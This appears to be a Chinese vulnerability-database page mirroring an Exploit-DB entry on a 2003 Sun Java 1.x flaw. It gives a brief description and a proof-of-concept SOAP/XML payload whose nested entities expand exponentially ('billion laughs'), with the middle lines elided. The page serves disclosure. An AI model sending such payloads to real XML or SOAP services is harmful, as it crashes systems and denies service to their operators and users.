Sun Java 1.x – XML Document Nested Entity Denial of Service

Sun Java 1.x – XML Document Nested Entity Denial of Service

漏洞ID 1054178 漏洞类型
发布时间 2003-09-22 更新时间 2003-09-22
图片[1]-Sun Java 1.x – XML Document Nested Entity Denial of Service-安全小百科CVE编号 N/A
图片[2]-Sun Java 1.x – XML Document Nested Entity Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23165
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8666/info

A problem has been identified in Sun Java when handling XML documents with specific constructs. Because of this, an attacker with the ability to cause the software to parse malicious XML documents may have the ability to crash a system hosting Sun Java. 

<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY x99 "&x100;&x100;"> <!ENTITY x98 "&x99;&x99;"> ... <!ENTITY x2 "&x3;&x3;"> <!ENTITY x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>

相关推荐: Microsoft IIS WebDAV ‘Search’ Denial of Service Vulnerability

Microsoft IIS WebDAV ‘Search’ Denial of Service Vulnerability 漏洞ID 1103345 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2001…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享